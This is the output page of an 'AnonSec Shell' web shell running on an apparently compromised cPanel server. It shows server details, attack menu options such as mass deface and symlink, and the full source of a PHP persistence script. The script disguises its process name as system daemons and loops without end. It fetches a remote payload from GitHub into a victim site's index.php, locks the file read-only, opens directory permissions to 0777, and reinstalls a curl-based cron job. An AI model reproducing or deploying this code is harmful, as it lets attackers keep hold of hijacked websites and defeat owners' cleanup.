AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 104.23.243.32   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /tmp/cache_mgr_6450aded/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /tmp/cache_mgr_6450aded/cache_watcher.php
<?php
set_time_limit(0);
ignore_user_abort(true);
date_default_timezone_set('Asia/Jakarta');
if (function_exists('cli_set_process_title')) {
    $fake_titles = array (
  0 => '/usr/sbin/apache2 -k start',
  1 => '[kworker/u8:2]',
  2 => '[rcu_sched]',
  3 => 'nginx: worker process',
  4 => 'php-fpm: pool www',
  5 => '/usr/sbin/sshd -D',
);
    @cli_set_process_title($fake_titles[array_rand($fake_titles)]);
}
// [PERBAIKAN] Gunakan flock untuk mencegah proses ganda
$lock_file = __FILE__ . '.lock';
$lock_handle = fopen($lock_file, 'c');
if (!$lock_handle || !flock($lock_handle, LOCK_EX | LOCK_NB)) {
    echo "[".date("H:i:s")."] ⚠️ Proses lain sudah berjalan. Keluar.\n";
    exit;
}
$filesToProtect = array (
  0 => 
  array (
    'target' => '/home2/cp648411/public_html/homhuan.com/include/index.php',
    'backupUrl' => 'https://raw.githubusercontent.com/Yentol21/yentol21/refs/heads/main/404.php',
  ),
);
$cronCommandsToEnsure = array (
  0 => '*/5 * * * * [ ! -f /home2/cp648411/public_html/homhuan.com/include/index.php ] && curl -s -o /home2/cp648411/public_html/homhuan.com/include/index.php https://raw.githubusercontent.com/Yentol21/yentol21/refs/heads/main/404.php && chmod 444 /home2/cp648411/public_html/homhuan.com/include/index.php #CACHE_MGR_22d912ba',
);
$dynamic_names = array (
  'dir_name' => 'cache_mgr_6450aded',
  'log_name' => 'cache_mgr.log',
  'script_name' => 'cache_watcher.php',
  'watcher_name' => 'l4_watcher.php',
  'cron_prefix' => 'CACHE_MGR_',
);
$interval = 5;
function is_shell_exec_available() {
    if (!function_exists('shell_exec')) return false;
    $disabled = ini_get('disable_functions');
    if ($disabled) {
        $disabled_arr = array_map('trim', explode(',', $disabled));
        return !in_array('shell_exec', $disabled_arr);
    }
    return true;
}
function fetchContent($url) {
    if (!function_exists('curl_init')) {
        echo "[".date("H:i:s")."] ❌ Ekstensi cURL tidak tersedia.\n";
        return false;
    }
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt($ch, CURLOPT_USERAGENT, 'CacheManager/1.1');
    $data = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $error = curl_error($ch);
    curl_close($ch);
    if ($data === false || $http_code !== 200) {
        echo "[".date("H:i:s")."] ❌ Gagal ambil backup dari {$url}. HTTP:{$http_code}. Error: {$error}\n";
        return false;
    }
    return $data;
}
function ensureDirPermsRecursive($dirPath, $perm = 0777, $currentDepth = 0, $maxDepth = 7) {
    if ($currentDepth > $maxDepth || !$dirPath || $dirPath === '.' || $dirPath === '..' ) return;
    if (is_link($dirPath)) return;
    if (is_dir($dirPath)) {
        // [PERBAIKAN] Konversi izin ke string oktal dengan benar
        $current_perms_octal_str = substr(sprintf('%o', @fileperms($dirPath)), -4);
        if ($current_perms_octal_str !== '0777' && $current_perms_octal_str !== '777') {
             echo "[".date("H:i:s")."] 📂 Izin dir '{$dirPath}' adalah '{$current_perms_octal_str}', ubah ke 0777.\n";
             @chmod($dirPath, $perm);
        }
    }
    $parentDir = dirname($dirPath);
    if ($parentDir !== $dirPath && $parentDir !== '/') {
        ensureDirPermsRecursive($parentDir, $perm, $currentDepth + 1, $maxDepth);
    }
}
function writeAndLock($path, $content) {
    $folder_of_path = dirname($path);
    if (!is_dir($folder_of_path)) {
        @mkdir($folder_of_path, 0777, true);
        ensureDirPermsRecursive($folder_of_path, 0777);
    }
    if (@file_put_contents($path, $content) !== false) {
        @chmod($path, 0444);
        return true;
    }
    return false;
}
echo "=============================================\n";
echo "🛡️ System Cache Process Started: ".date("Y-m-d H:i:s")."\n";
echo "🛡️ Cache Script: {$dynamic_names['script_name']} in " . dirname(__FILE__) . "/\n";
echo "=============================================\n";
foreach ($filesToProtect as $file) {
    echo "- Target: " . $file['target'] . "\n Backup: " . $file['backupUrl'] . "\n";
}
echo "=============================================\n";
flush();
while (true) {
    foreach ($filesToProtect as $file) {
        $targetFile = $file['target'];
        $backupFileUrl = $file['backupUrl'];
        $targetDir = dirname($targetFile);
        echo "[".date("H:i:s")."] 🔍 Cek: " . basename($targetFile);
        // [PERBAIKAN] Panggil chmod sebelum cek file
        ensureDirPermsRecursive($targetDir, 0777);
        if (!file_exists($targetFile)) {
            echo " -> 🚨 HILANG! Memulihkan...\n";
            $data = fetchContent($backupFileUrl);
            if ($data !== false) {
                if (writeAndLock($targetFile, $data)) {
                    echo "[".date("H:i:s")."] ✅ Berhasil dipulihkan dan file dikunci ke 0444: $targetFile\n";
                } else {
                    echo "[".date("H:i:s")."] ❌ GAGAL menulis file ke lokasi: $targetFile\n";
                }
            }
        } else {
            // [PERBAIKAN] Cek izin dengan benar
            $current_perms_file = substr(sprintf('%o', @fileperms($targetFile)), -4);
            if ($current_perms_file !== '0444' && $current_perms_file !== '444') {
                @chmod($targetFile, 0444);
                echo " -> 🔓 Izin diubah! Mengunci ulang ke 0444.\n";
            } else {
                echo " -> ✅ File aman.\n";
            }
        }
        flush();
    }
    if (is_shell_exec_available()) {
        $current_crontab = shell_exec('crontab -l 2>/dev/null');
        $missing_crons = false;
        foreach($cronCommandsToEnsure as $cron_command) {
            if (strpos($current_crontab, $cron_command) === false) {
                echo "[".date("H:i:s")."] 🚨 CRON HILANG: " . htmlentities(substr($cron_command, 0, 70)) . "...\n";
                $escaped_cron_command = str_replace("'", "'\''", $cron_command);
                shell_exec('(crontab -l 2>/dev/null; echo \'' . $escaped_cron_command . '\') | crontab -');
                $missing_crons = true;
            }
        }
        if (!$missing_crons) {
            echo "[".date("H:i:s")."] ✅ Semua cron job aman.\n";
        } else {
            echo "[".date("H:i:s")."] ✅ Cron job yang hilang telah dipulihkan.\n";
        }
    } else {
        echo "[".date("H:i:s")."] ⚠️ Tidak dapat memeriksa cron job, shell_exec dinonaktifkan.\n";
    }
    echo "------------------ Tidur selama {$interval} detik ------------------\n";
    flush();
    sleep($interval);
}
// Melepas lock saat skrip selesai
flock($lock_handle, LOCK_UN);
fclose($lock_handle);
@unlink($lock_file);

Anon7 - 2022
AnonSec Team